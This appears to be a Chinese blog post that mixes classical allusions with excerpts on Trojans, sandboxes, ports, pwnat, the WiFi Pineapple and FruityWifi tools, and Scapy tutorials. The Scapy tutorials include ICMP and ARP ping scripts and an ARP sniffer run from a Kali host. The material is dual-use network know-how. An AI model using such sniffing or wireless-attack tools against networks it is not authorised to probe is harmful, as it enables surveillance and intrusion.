─── 《大樹底下好乘涼 ︰ 《大哉問》》

 

天機深，所以遁甲

─── 摘自《《派生》 Python 作坊【甲】尋本溯源》

如果水土平，可以『  』癸度；那麼天機深，只能藏『  』甲的了。維基百科講︰

奇門遁甲

奇門遁甲與大六壬、太乙神數並稱三式。為中國神秘學中預測學的一個特有門類。乃利用洛書軌跡，九宮八卦以及五行相生相剋的道理，來預測地理方向的優劣，進而規劃一個人的行程，最終達到對自己最有利的目的，為算命相術所兼用。

簡介

奇門遁甲以乙、丙、丁稱為三奇；以休、生、傷、杜、景、死、驚、開稱為八門，故名「奇門」。天干中「甲」最尊貴而不顯露，六甲常隱藏於「戊、己、庚、辛、壬、癸」六儀之內，三奇、六儀分布九宮，而甲不獨占一宮，故名「遁甲」。

在古代，民間流傳只有帝王附近如軍師、欽天監、國師等重要大臣才通曉奇門遁甲之術。此法後來被神化為一門法術，以至於一些小說將其描寫為有「飛天遁地」之本領的法術。亦有人稱之為帝王學 。

歷史

傳說

據煙波釣叟歌中記載，奇門遁甲起源於傳說時代，黃帝炎帝聯軍和蚩尤在涿鹿展開的一場大戰，蚩尤身高七尺，鐵頭銅身，刀槍不入 ，能呼風喚雨並在戰場上製造迷霧，使得炎黃聯軍陷入不利境地。黃帝於是向天祈禱，終於獲得九天玄女給的河圖洛書和彩鳳銜來的太乙、六壬、遁甲之書，黃帝以此發明了指南車，逆轉了戰局，取得了勝利。黃帝令風后演繹天書，並最終演繹成三式之法：大六壬 、太乙神數、奇門遁甲一千零八十局（陽遁、陰遁各五百四十局） 。後來該術數為姜子牙所習得，由姜子牙刪減為七十二局（陽遁、陰遁各三十六局），再經過姜子牙傳給黃石公，再由黃石公傳給張良，最終由張良將其精簡為現今的一十八局（陽遁、陰遁各九局） 。

史實

清錢大昕在《十駕齋養新錄》指出《史記・龜策傳》中衛平替宋元王解夢之法為遁甲術,而近代嚴敦傑指出所用的方法應該是六壬。
東晉煉丹家葛洪在其著作《抱朴子》中記載「余少有入山之志,由此乃行學遁甲書,乃有六十餘卷,事不可卒精,故鈔集其要,以為囊中立成,然不中以筆傳」。但書中並無記載軍事上的應用。

南北朝梁簡文帝蕭綱所寫的《從軍行》中有「三門應遁甲」,何丙郁認為這暗示遁甲與軍事有關。

南北朝時期遁甲已經流行，《隋書・經籍志》中所記載的帶有「遁甲」的書目數量超過五十，並且存在南北朝遁甲書的記載。

據《崇寧國子監算學令》記載，三式為北宋司天台學生的考察科目 。

……

，誠以人性為依歸。物理中『量子』有奇異行為，宇宙裡『時空』可『重力』波動。『預測』一事總在『幽明』之間！故從把握今朝到開創明天的『機率』才是大的乎？因此於『舊探索』將『終』，『新研究』伊『始』之際，

─── 摘自《W!O+ 的《小伶鼬工坊演義》︰ 一窺全豹之系統設計‧探索‧癸》

 

說『誘惑』也！

特洛伊木馬

特洛伊木馬是木馬屠城記裡，希臘軍隊在特洛伊戰爭中，用來攻破特洛伊城的那隻大木馬。值得注意的是，木馬屠城記並非於古希臘詩人荷馬的兩部著作伊利亞特與奧德賽裡記載，而是在羅馬帝國時期的詩人維吉爾所寫的史詩《埃涅阿斯紀》中， 才第一次被記載。木馬屠城記一直被現代科學人視為神話故事，直至十九世紀時，業餘考古學者海因里希·施利曼（Heinrich Schliemann）才證實特洛伊城的遺址。

《The Procession of the Trojan Horse in Troy》，Domenico Tiepolo (1773)。

戰爭起因

據荷馬與希臘神話所載，這個故事的起因是源自一個金蘋果。 這個故事的開端，就是海洋女神忒提斯（Thetis）與希臘國王佩琉斯（Peleus）的婚禮，原本宙斯與忒提斯相戀，但那時傳說忒提斯的兒子（也就是未來的阿基里斯（Achilles））會比他的父親還強大，宙斯害怕當年推翻他父親的事重演，於是將她嫁給了著名英雄佩琉斯，避免影響他的政權。婚禮上邀請了很多神，唯獨麻煩女神埃里斯（Eris）沒有被邀請。她很生氣，便拋出一個金蘋果，刻著「獻給最美麗的女神」。智慧女神雅典娜、愛神阿芙羅狄忒和天后赫拉都認為自己最有資格冠上蘋果上最美麗女神的美譽。為了解決這個難題，最後她們飛到艾達山請求特洛伊王子帕里斯仲裁。三個女神都試圖賄賂帕里斯：雅典娜答應讓帕里斯成為世界上最睿智的學者；希拉答應讓帕里斯成為天底下最有權勢的君王；阿芙羅狄忒則以世界上最美麗的女子作為賄賂。最後帕里斯忠於感官天性選擇了阿芙羅狄忒。作為回報，阿芙羅狄忒施行魔咒，讓斯巴達王國的王后，公認為世界上最漂亮的女人海倫和帕里斯共墜愛河。海倫為了愛情拋棄了她的家鄉，丈夫墨涅拉俄斯還有稚女。帕里斯的行動惹怒了斯巴達國王墨涅拉俄斯，其怒不可抑，於是向兄長阿伽門農求援，並聯合希臘各城邦向特洛伊宣戰。

 

心難測，故而生

Trojan horse (computing)

This article is part of a series on
Computer Hacking

In computing, a Trojan horse, or Trojan, is any malicious computer program which misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive wooden horse that led to the fall of the city of Troy.^{[1][2][3][4][5]}

Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an e-mail attachment disguised to appear not suspicious, (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else . Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer.^[6] Trojans may allow an attacker to access users’ personal information such as banking information, passwords, or personal identity. It can infect other devices connected to the network. Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.^[7]

Origin of the concept

This terminology occurs for the first time in a US Air Force report in 1974 on the analysis of vulnerability in computer systems.^[8] It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture “Reflections on Trusting Trust”,^[9] subtitled:

 

To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust: the people who wrote the software.

He mentioned that he knew about the possible existence of Trojan horses in a report on the security of Multics of which he was unfortunately unable to find a reference. However Paul Karger and Roger Schell affirm that this is their above cited report.^[10][8][11]

Malicious uses

Trojan in this way may require interaction with a malicious controller (not necessarily distributing the Trojan) to fulfill their purpose. It is possible for those involved with Trojans to scan computers on a network to locate any with a Trojan installed, which the hacker can then control.^[12]

Some Trojans take advantage of a security flaw in older versions of Internet Explorer and Google Chrome to use the host computer as an anonymizer proxy to effectively hide Internet usage,^[13] enabling the controller to use the Internet for illegal purposes while all potentially incriminating evidence indicates the infected computer or its IP address. The host’s computer may or may not show the internet history of the sites viewed using the computer as a proxy. The first generation of anonymizer Trojan horses tended to leave their tracks in the page view histories of the host computer. Later generations of the Trojan tend to “cover” their tracks more efficiently. Several versions of Sub7 have been widely circulated in the US and Europe and became the most widely distributed examples of this type of Trojan.^[12]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.^[14][15] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer^[16] and the German “state trojan” nicknamed R2D2.^[14]German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.^[17]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users’ privacy, Trojans are becoming more common. According to a survey conducted byBitDefender from January to June 2009, “Trojan-type malware is on the rise, accounting for 83-percent of the global malware detected in the world.” Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.^[18] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.^[19]

耶？若借

samyk/pwnat

The only tool to punch holes through firewalls/NATs where both clients and server can be behind separate NATs without any 3rd party involvement. Pwnat uses a newly developed technique, exploiting a property of NAT translation tables, with no 3rd party, port forwarding, DMZ, router administrative requirements, or spoofing required. https://samy.pl/pwnat/

pwnat - http://samy.pl/pwnat

pwnat, by Samy Kamkar, is a tool that allows any client
behind a NAT to communicate with a server behind a
separate NAT with *no* port forwarding and *no* DMZ
setup on any routers in order to directly communicate
with each other.

There is no middle man, no proxy, no 3rd party, no UPnP
required, no spoofing, no DNS tricks. The server does
not need to know the client's IP address before connecting.

More importantly, the client can then connect to any
host or port on any remote host or to a fixed host and
port decided by the server.

Simply put, this is a proxy server that works behind a NAT,
even when the client is also behind a NAT.

You can read the paper published in IEEE and presented at
the IEEE P2P'10 Conference here: http://samy.pl/pwnat/pwnat.pdf

 

之言推論，『危險』恐在指尖呦★

 

 

 

 

 

 

 

有人說大腦是個不設防的城市，因此務須警醒『人』『言』，切莫偏『信』的好。早在網景推出『JavaScript』網頁手稿語言︰

JavaScript，一種高階程式語言，通過解釋執行，是一門動態型別，物件導向（基於原型）的直譯語言^[4]。它已經由ECMA（歐洲電腦製造商協會）通過ECMAScript實現語言的標準化^[4]。它被世界上的絕大多數網站所使用，也被世界主流瀏覽器（Chrome、IE、FireFox、Safari、Opera）支援。JavaScript是一門基於原型、函式先行的語言^[5]，是一門多範式的語言，它支援物件導向編程，指令式編程，以及函數語言程式設計。它提供語法來操控文字，陣列，日期以及正規表示式等，不支援I/O，比如網路，儲存和圖形等，但這些都可以由它的宿主環境提供支援。

雖然JavaScript與Java這門語言不管是在名字上，或是在語法上都有很多相似性，但這兩門程式語言從設計之初就有很大的不同，JavaScript的語言設計主要受到了Self（一種原型程式設計語言）和Scheme（一門函數語言程式設計語言）的影響^[5]。在語法結構上它又與C語言有很多相似（例如if條件語句、while迴圈、switch語句、do-while迴圈等）^[6]。

在用戶端，JavaScript在傳統意義上被實現為一種解釋語言，但在最近，它已經可以被即時編譯（JIT）執行。隨著最新的HTML5和CSS3語言標準的推行它還可用於遊戲、桌面和行動應用程式的開發和在伺服器端網路環境執行，如Node.js。

時，就已經知道可能的資安疑慮。所以瀏覽器才將 JavaScript 程式放在

沙盒 (電腦安全)

在計算機安全領域，沙盒（英語：sandbox，又譯為沙箱）是一種安全機制，為執行中的程式提供的隔離環境。通常是作為一些來源不可信、具破壞力或無法判定程式意圖的程式提供實驗之用^[1]。

沙盒通常嚴格控制其中的程式所能存取的資源，比如，沙盒可以提供用後即回收的磁碟及記憶體空間。在沙盒中，網路存取、對真實系統的存取、對輸入裝置的讀取通常被禁止或是嚴格限制。從這個角度來說，沙盒屬於虛擬化的一種。

沙盒中的所有改動對作業系統不會造成任何損失。通常，這種技術被電腦技術人員廣泛用於測試可能帶毒的程式或是其他的惡意代碼^[2]。

裡執行！這樣不就安全了嗎？殊不知由於廠商追求產品特色，大開便門；使用者以為安全，隨意打開權限；加上許多其他原由︰

………

造成的資安問題或許更勝於『電腦病毒』的哩？？

─── 《樹莓派 0W 狂想曲︰資安探測器《♪♪》》

 

市場『競爭』所引發之『攻防』，是否是軟體『門戶』的由來耶？

Undocumented feature

Undocumented features also known using the term Feature, not a bug are software features that are frequently found in software releases. Sometimes the documentation is omitted through simple oversight, but undocumented features are often essential elements of the software that are not intended for use by end users, but left available for use by the vendor for software support and development.

Since the suppliers of the software usually consider the software documentation to constitute a contract for the behavior of the software, undocumented features are generally left unsupported, and may be removed or changed at will and without notice to the users.

Types

Undocumented features (for example, the ability to change the switch character in MS-DOS, usually to a hyphen) can be included for compatibility purposes (in this case with Unix utilities) or for future-expansion reasons. However; if the software provider changes their software strategy to better align with the business, the absence of documentation makes it easier to justify the feature’s removal.

New versions of software might omit mention of old (possibly superseded) features in documentation but keep them implemented for users who’ve grown accustomed to them.^[1]

While an incorrect use of the term, in some cases software bugs are referred to -jokingly- as undocumented features. (“It’s not a bug; it’s an undocumented feature!“) ^[2] This usage may have been popularised in some of Microsoft’s responses to bug reports for its first Word for Windows product,^[3] but doesn’t originate there. The oldest surviving reference on Usenet dates to 5 March 1984.^[4] Between 1969 and 1972, Sandy Mathes, a systems programmer for PDP-8 software at Digital Equipment Corporation (DEC) in Maynard, MA, used the terms “bug” and “feature” in her reporting of test results to distinguish between undocumented actions of delivered software products that were unacceptable and tolerable, respectively. This usage may have been perpetuated.^[5]

Exceptions

Ironically, undocumented features themselves have become a major feature of computer games. Developers often include various cheats and other special features (“easter eggs“) that are not explained in the packaged material, but have become part of the “buzz” about the game on the Internet and among gamers. The undocumented features of foreign games are often elements that were not localized from their native language.

Closed source APIs can also have undocumented functions that are not generally known. These are sometimes used to gain a commercial advantage over third-party software by providing additional information or better performance to the application provider.

 

『非官方』之『擴充』，是否都『可疑』乎？？

TCP/UDP埠列表

電腦之間依照網際網路傳輸層TCP/IP協定的協定通訊，不同的協定都對應不同的 埠。並且，利用資料包的UDP也不一定和TCP採用相同的埠號碼。以下為兩種通訊協定的埠列表連結：

埠狀態顏色圖例

以下圖例表明了埠的狀態：

使用狀態	敘述	顏色
官方	應用與埠組合記錄在IANA的埠分配列表中[1]	白
非官方	應用與埠組合不在IANA的埠分配列表中	藍
多重使用	已知多個應用程式使用這個埠	黃

0到1023號埠

以下列表僅列出常用埠，詳細的列表請參閱IANA網站。

埠	描述	狀態
0/TCP,UDP	保留埠；不使用（若傳送過程不準備接受回覆訊息，則可以作為源埠）	官方
1/TCP,UDP	TCPMUX（傳輸控制協定埠服務多路開關選擇器）	官方
5/TCP,UDP	RJE（遠端作業登入）	官方
7/TCP,UDP	Echo（回顯）協定	官方
9/UDP	DISCARD（丟棄）協定	官方
9/TCP,UDP	網路喚醒	非官方
11/TCP,UDP	SYSTAT協定	官方
13/TCP,UDP	DAYTIME協定	官方
15/TCP,UDP	NETSTAT協定	官方
17/TCP,UDP	QOTD（Quote of the Day，每日參照）協定	官方
18/TCP,UDP	訊息傳送協定	官方
19/TCP,UDP	CHARGEN（字元發生器）協定	官方
20/TCP,UDP	檔案傳輸協定 – 預設資料埠	官方
21/TCP,UDP	檔案傳輸協定 – 控制埠	官方
22/TCP,UDP	SSH（Secure Shell） – 遠端登入協定，用於安全登入檔案傳輸（SCP，SFTP）及埠重新定向	官方
23/TCP,UDP	Telnet終端仿真協定 – 未加密文字通訊	官方
25/TCP,UDP	SMTP（簡單郵件傳輸協定） – 用於郵件伺服器間的電子郵件傳遞	官方

………

 

或許未來的

Communication protocol

In telecommunication, a communication protocol is a system of rules that allow two or more entities of a communications system to transmit information via any kind of variation of a physical quantity. The protocol defines the rules, syntax, semantics andsynchronization of communication and possible error recovery methods. Protocols may be implemented by hardware, software, or a combination of both.^{[1][not in citation given]}

Communicating systems use well-defined formats for exchanging various messages. Each message has an exact meaning intended to elicit a response from a range of possible responses pre-determined for that particular situation. The specified behavior is typically independent of how it is to be implemented. Communication protocols have to be agreed upon by the parties involved.^[2] To reach agreement, a protocol may be developed into a technical standard. A programming language describes the same for computations, so there is a close analogy between protocols and programming languages: protocols are to communication what programming languages are to computations.^[3]

Multiple protocols often describe different aspects of a single communication. A group of protocols designed to work together are known as a protocol suite; when implemented in software they are a protocol stack.

Internet communication protocols are published by the Internet Engineering Task Force (IETF). The IEEE handles wired and wireless networking, and the International Organization for Standardization (ISO) handles other types. The ITU-T handles telecommunication protocols and formats for the public switched telephone network (PSTN). As the PSTN and Internet converge, the standards are also being driven towards convergence.

 

『創新』者，在

Adding new protocols

Adding new protocol (or more correctly: a new layer) in Scapy is very easy. All the magic is in the fields. If the fields you need are already there and the protocol is not too brain-damaged, this should be a matter of minutes.

Simple example

A layer is a subclass of the Packet class. All the logic behind layer manipulation is held by thePacket class and will be inherited. A simple layer is compounded by a list of fields that will be either concatenated when assembling the layer or dissected one by one when disassembling a string. The list of fields is held in an attribute named fields_desc. Each field is an instance of a field class:

class Disney(Packet):
    name = "DisneyPacket "
    fields_desc=[ ShortField("mickey",5),
                 XByteField("minnie",3) ,
                 IntEnumField("donald" , 1 ,
                      { 1: "happy", 2: "cool" , 3: "angry" } ) ]

In this example, our layer has three fields. The first one is a 2-byte integer field named mickey and whose default value is 5. The second one is a 1-byte integer field named minnie and whose default value is 3. The difference between a vanilla ByteField and an XByteField is only the fact that the preferred human representation of the field’s value is in hexadecimal. The last field is a 4-byte integer field named donald. It is different from a vanilla IntField by the fact that some of the possible values of the field have literate representations. For example, if it is worth 3, the value will be displayed as angry. Moreover, if the “cool” value is assigned to this field, it will understand that it has to take the value 2.

If your protocol is as simple as this, it is ready to use:

>>> d=Disney(mickey=1)
>>> ls(d)
mickey : ShortField = 1 (5)
minnie : XByteField = 3 (3)
donald : IntEnumField = 1 (1)
>>> d.show()
###[ Disney Packet ]###
mickey= 1
minnie= 0x3
donald= happy
>>> d.donald="cool"
>>> raw(d)
’\x00\x01\x03\x00\x00\x00\x02’
>>> Disney( )
<Disney mickey=1 minnie=0x3 donald=cool |>

This chapter explains how to build a new protocol within Scapy. There are two main objectives:

• Dissecting: this is done when a packet is received (from the network or a file) and should be converted to Scapy’s internals.
• Building: When one wants to send such a new packet, some stuff needs to be adjusted automatically in it.

 

之前，務須『慎思』也！

※ 註︰

 

『方便』其後『蛻變』的人，展翅高飛呦◎

Next-generation network

The next-generation network (NGN) is a body of key architectural changes in telecommunication core and access networks. The general idea behind the NGN is that one network transports all information and services (voice, data, and all sorts of media such as video) by encapsulating these into IP packets, similar to those used on the Internet. NGNs are commonly built around the Internet Protocol, and therefore the term all IP is also sometimes used to describe the transformation of formerly telephone-centric networks toward NGN.

NGN is a different concept from Future Internet, which is more focused on the evolution of Internet in terms of the variety and interactions of services offered.

Introduction of NGN

NGN Seminar in Fusion Technology Center byNICT(Japan) researcher

According to ITU-T, the definition is:

A next-generation network (NGN) is a packet-based network which can provide services including Telecommunication Services and is able to make use of multiple broadband, quality of Service-enabled transport technologies and in which service-related functions are independent from underlying transport-related technologies. It offers unrestricted access by users to different service providers. It supports generalized mobility which will allow consistent and ubiquitous provision of services to users.^[1]

From a practical perspective, NGN involves three main architectural changes that need to be looked at separately:

• In the core network, NGN implies a consolidation of several (dedicated or overlay) transport networks each historically built for a different service into one core transport network (often based on IP and Ethernet). It implies amongst others the migration of voice from a circuit-switched architecture (PSTN) to VoIP, and also migration of legacy services such as X.25, frame relay (either commercial migration of the customer to a new service like IP VPN, or technical emigration by emulation of the “legacy service” on the NGN).
• In the wired access network, NGN implies the migration from the dual system of legacy voice next to xDSL setup in local exchanges to a converged setup in which the DSLAMs integrate voice ports or VoIP, making it possible to remove the voice switching infrastructure from the exchange.^[2]
• In the cable access network, NGN convergence implies migration of constant bit rate voice to CableLabs PacketCable standards that provide VoIP and SIP services. Both services ride over DOCSIS as the cable data layer standard.

In an NGN, there is a more defined separation between the transport (connectivity) portion of the network and the services that run on top of that transport. This means that whenever a provider wants to enable a new service, they can do so by defining it directly at the service layer without considering the transport layer – i.e. services are independent of transport details. Increasingly applications, including voice, tend to be independent of the access network (de-layering of network and applications) and will reside more on end-user devices (phone, PC, set-top box).

 

 

 

 

 

 

 

南宋之哲學家與教育家吕祖谦，字伯恭，壽州人，因呂姓而郡望『東萊』，世稱『東萊先生』。著有《東萊博議》註解『左傳』，開宗第一篇即是《鄭伯克段於鄢》，其有言曰︰

釣者負魚，魚何負於釣？獵者負獸，獸何負於獵。莊公負叔段，叔段何負于莊公。

【 WiFi Pineapple 】

The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose built hardware and software, the WiFi Pineapple enable users to quickly and easily deploy advanced attacks using our intuitive web interface.

【 FruityWifi 】

Hi All,
FruityWifi is a wireless network auditing tool based in the wifi Pineapple. The application can be installed in any Debian based system adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi).

【 fruitywifi.com 】

FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.

Initialy the application was created to be used with the Raspberry-Pi, but it can be installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets support, Mobile Broadband (3G/4G) support, a new control panel, and more.

 

駭客大學的教具，且列為先修課了。

── 已發生的事，帶來省思；未發生的事，應當慎慮！！ ──

─── 《音樂播放器原型機之《可能性》釣客與游魚？？》

 

當『工具』嫻熟了，因其『性能』高低，自有

Build your own tools

You can use Scapy to make your own automated tools. You can also extend Scapy without having to edit its source file.

If you have built some interesting tools, please contribute back to the github wiki !

 

之時◎

宜乎『由淺入深』先『練習』的也◎

#! /usr/bin/env python

import sys
from scapy.all import sr1,IP,ICMP

p=sr1(IP(dst=sys.argv[1])/ICMP())
if p:
    p.show()

※ 執行參考︰

root@kali:~/test# python ICMP-echo.py 5.168.168.20
Begin emission:
...............................Finished sending 1 packets.
........*
Received 40 packets, got 1 answers, remaining 0 packets
###[ IP ]### 
  version   = 4
  ihl       = 5
  tos       = 0x0
  len       = 28
  id        = 61102
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = icmp
  chksum    = 0x30c5
  src       = 5.168.168.20
  dst       = 5.168.168.9
  \options   \
###[ ICMP ]### 
     type      = echo-reply
     code      = 0
     chksum    = 0xffff
     id        = 0x0
     seq       = 0x0
###[ Padding ]### 
        load      = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

 

This is a more complex example which does an ARP ping and reports what it found with LaTeX formatting:

#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as a result

import sys
if len(sys.argv) != 2:
    print "Usage: arping2tex <net>\n  eg: arping2tex 192.168.1.0/24"
    sys.exit(1)

from scapy.all import srp,Ether,ARP,conf
conf.verb=0
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),
              timeout=2)

print r"\begin{tabular}{|l|l|}"
print r"\hline"
print r"MAC & IP\\"
print r"\hline"
for snd,rcv in ans:
    print rcv.sprintf(r"%Ether.src% & %ARP.psrc%\\")
print r"\hline"
print r"\end{tabular}"

※ 執行參考︰

root@kali:~/test# python arping2tex.py 5.168.168.20
\begin{tabular}{|l|l|}
\hline
MAC & IP\\
\hline
b8:27:eb:d9:d7:2f & 5.168.168.20\\
\hline
\end{tabular}

 

Here is another tool that will constantly monitor all interfaces on a machine and print all ARP request it sees, even on 802.11 frames from a Wi-Fi card in monitor mode. Note the store=0 parameter to sniff() to avoid storing all packets in memory for nothing:

#! /usr/bin/env python
from scapy.all import *

def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
        return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

sniff(prn=arp_monitor_callback, filter="arp", store=0)

※ 執行參考︰

root@kali:~/test# python arpmonitor.py 
4c:e6:76:c4:ec:f8 5.168.168.1
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
4c:72:b9:41:49:e1 5.168.168.2
b8:27:eb:c2:b0:6e 5.168.168.9
^Croot@kali:~/test#

 

 

 

 

 

 

 

如果將日常使用的個人電腦看成『計算機』 + 『輸出入界面』 + 『操作者』，那麼『自動機器』 Automata 就像無需『操作者』的獨立運行系統。既然早有『圖零測試』的議論，要是將

計算機 → 大腦

輸出入界面 → 神經網路

操作者 → ？

，『生物』能夠被當作『生化物理自動機器』嗎？？大語言學家 Noam Chomsky 認為語言是人類的一種天賦，而且為人類所獨有。這從『進化論』的角度來講，『人的語言』必然得是『生物言語』的一種『突破』變化！當真人是『有靈魂』的？還是『五蘊皆空』之『人無我』與『法無我』的呢？？要有人說︰他在腦海中，聽到 Tux 在『講話』！那他定然是『瘋』了的吧！！

『色聲香味觸法』進了『腦海』怕它都是『編過碼』之『符號』，連笛卡爾都只能以『我思故我在』帶過，那『桶中之腦？？』聽到無有言乎！！

─── 《TUX@RPI ︰ 《咸澤碼訊》》

 

難到人類不該以『自我意志』動作，『上緊發條』自動自發乎？

自動機

自動機（英語：Automaton，複數：Automata，又稱自動機器、自動機械），是指非電源供應，以發條裝置作為動力來源，使自己運作的機器；自動機是必須先手動上緊發條，發條帶動機器內部的齒輪及隨動機械零件，才能自己運作，發條的能量就像蓄電池一樣消耗，必須再上緊發條；運作原理有別於發動機、發電機、電動機及永動機。

詞源

Automaton一詞源於古希臘語：αὐτόματος（automatos），意為 「以自我意志動作」。

 

還是靈魂束縛於『具體』實有，無心『抽象』思維也！

自動機理論

在理論電腦科學中，自動機理論是對抽象機和它們能解決的問題的研究。自動機理論密切關聯於形式語言理論，因為自動機經常按它們所能辨識的形式語言類來分類。

基本描述

自動機是有限狀態機（FSM）的數學模型。FSM是給定符號輸入，依據（可表達為一個表格的）轉移函式「跳轉」過一系列狀態的一種機器。在常見的FSM的「米利型有限狀態機」（Mealy）變體中 ，這個轉移函式告訴自動機給定當前狀態和當前字元的時候下一個狀態是什麼。

逐個讀取輸入中的符號，直到被完全耗盡(把它當作有一個字寫在其上的磁帶，通過自動機的讀磁頭來讀取它；磁頭在磁帶上前行移動 ，一次讀一個符號)。一旦輸入被耗盡，自動機被稱為「停止」了。

依賴自動機停止時的狀態，稱呼這個自動機要麼是「接受」要麼「拒絕」這個輸入。如果停止於「接受狀態」，則自動機「接受」了這個字。在另一方面，如果它停止於「拒絕狀態」，則這個字被「拒絕」。自動機接受的所有字的集合被稱為「這個自動機接受的語言」。

但要注意，自動機一般不必須有有限數目甚至可數個狀態。比如，量子有限自動機有不可數無限個狀態，因為所有可能狀態的集合是在復投影空間中所有點的集合。所以，量子有限自動機和有限狀態機一樣，都是更一般想法拓撲自動機的特殊情況，它的狀態的集合是拓撲空間，而狀態轉移函式取自在這個空間上的所有可能函式。拓撲自動機經常叫做 M-自動機，簡單是半自動機加上接受狀態集合的補充，這裡的集合交集確定初始狀態是被接受還是被拒絕。

一般的說，自動機不需要嚴格的接受或拒絕一個輸入；它可以按某個在零和一之間的機率接受它。還是用量子有限自動機作為展範例子，它只按某個機率接受輸入。這個想法也是更一般情況幾何自動機或度量自動機的特殊情況，它的狀態的集合是度量空間，一個語言被這個自動機接受如果在初始點和接受狀態的集合之間的距離關於這個度量是足夠的小。

 

故而想說點『工具觀』︰

Automata

Scapy enables to create easily network automata. Scapy does not stick to a specific model like Moore or Mealy automata. It provides a flexible way for you to choose you way to go.

An automaton in Scapy is deterministic. It has different states. A start state and some end and error states. There are transitions from one state to another. Transitions can be transitions on a specific condition, transitions on the reception of a specific packet or transitions on a timeout. When a transition is taken, one or more actions can be run. An action can be bound to many transitions. Parameters can be passed from states to transitions and from transitions to states and actions.

From a programmer’s point of view, states, transitions and actions are methods from an Automaton subclass. They are decorated to provide meta-information needed in order for the automaton to work.

class HelloWorld(Automaton):
    @ATMT.state(initial=1)
    def BEGIN(self):
        print "State=BEGIN"

    @ATMT.condition(BEGIN)
    def wait_for_nothing(self):
        print "Wait for nothing..."
        raise self.END()

    @ATMT.action(wait_for_nothing)
    def on_nothing(self):
        print "Action on 'nothing' condition"

    @ATMT.state(final=1)
    def END(self):
        print "State=END"

In this example, we can see 3 decorators:

• ATMT.state that is used to indicate that a method is a state, and that can have initial, final and error optional arguments set to non-zero for special states.
• ATMT.condition that indicate a method to be run when the automaton state reaches the indicated state. The argument is the name of the method representing that state
• ATMT.action binds a method to a transition and is run when the transition is taken.

Running this example gives the following result:

>>> a=HelloWorld()
>>> a.run()
State=BEGIN
Wait for nothing...
Action on 'nothing' condition
State=END

This simple automaton can be described with the following graph:

The graph can be automatically drawn from the code with:

>>> HelloWorld.graph()

※ 參考︰

 

樂於介紹『pyladies』

econchick/ipython-scapy

ipython-scapy/Extra.md

In absolutely no particular order of anything:

Tutorial Resources

• [Slides]({{ get_asset(“pdfs/spy-tutorial.pdf”) }})
• IPython Notebooks
• IPython Notebook Server Setup

Extra Scapy resources

• Source code [hg]
• Documentation
• The Very Unofficial Dummies Guide to Scapy [PDF]
• Packet Sniffing Tutorial

Other tools

• tcpdump – command-line packet analyzer
• Metasploit Database – well-kept/well-known database of known vulnerabilities (e.g. CVEs) & exploits

Good to keep handy

• Wireshark’s community collection of sample packets
• Wireshark / Scapy capture filters when sniffing traffic
• TCP threeway handshake
• tcpdump tutorial & primer
• PGP Best Practices

 

所整理的筆記以及文件呦☆

 

 

 

 

 

 

 

這時海之涯的另一端正是『拓荒』的時代，1774 年出生的 Johnny Chapman ，譜出『蘋果種子』Appleseed 的傳奇。

1776年7月4日，美國的大陸會議通過《獨立宣言》，宣言這個新國家是獨立的，完全脫離英國，目的是為『圖生存、求自由、謀幸福』，實現啟蒙運動的理想。之後過了一百三十九年，一九一五年三月十一日，Joseph Carl Robnett Licklider 誕生於密蘇里州的聖路易斯，不知距馬克‧吐溫的湯姆──密蘇里州聖彼得斯堡──歷險記之地有多少距離？身為浸信會牧師獨子的他，自幼喜歡玩模型飛機，展現了工程天份，終身喜好修整汽車，史稱『計算機種子』。

─── 《一個奇想！！》

 

不知 Lick 是否預見『銀河際網路』，將衍生『網路街頭抗議』哩☆

阻斷服務攻擊

阻斷服務攻擊（英語：denial-of-service attack，縮寫：DoS attack、DoS）亦稱洪水攻擊，是一種網路攻擊手法，其目的在於使目標電腦的網路或系統資源耗盡，使服務暫時中斷或停止，導致其正常用戶無法存取。

當駭客使用網路上兩個或以上被攻陷的電腦作為「殭屍」向特定的目標發動「阻斷服務」式攻擊時，稱為分散式阻斷服務攻擊（distributed denial-of-service attack，縮寫：DDoS attack、DDoS）。據2014年統計，被確認為大規模DDoS的攻擊已達平均每小時28次。^[1]DDoS發起者一般針對重要服務和知名網站進行攻擊，如銀行、信用卡支付閘道器、甚至根域名伺服器等。

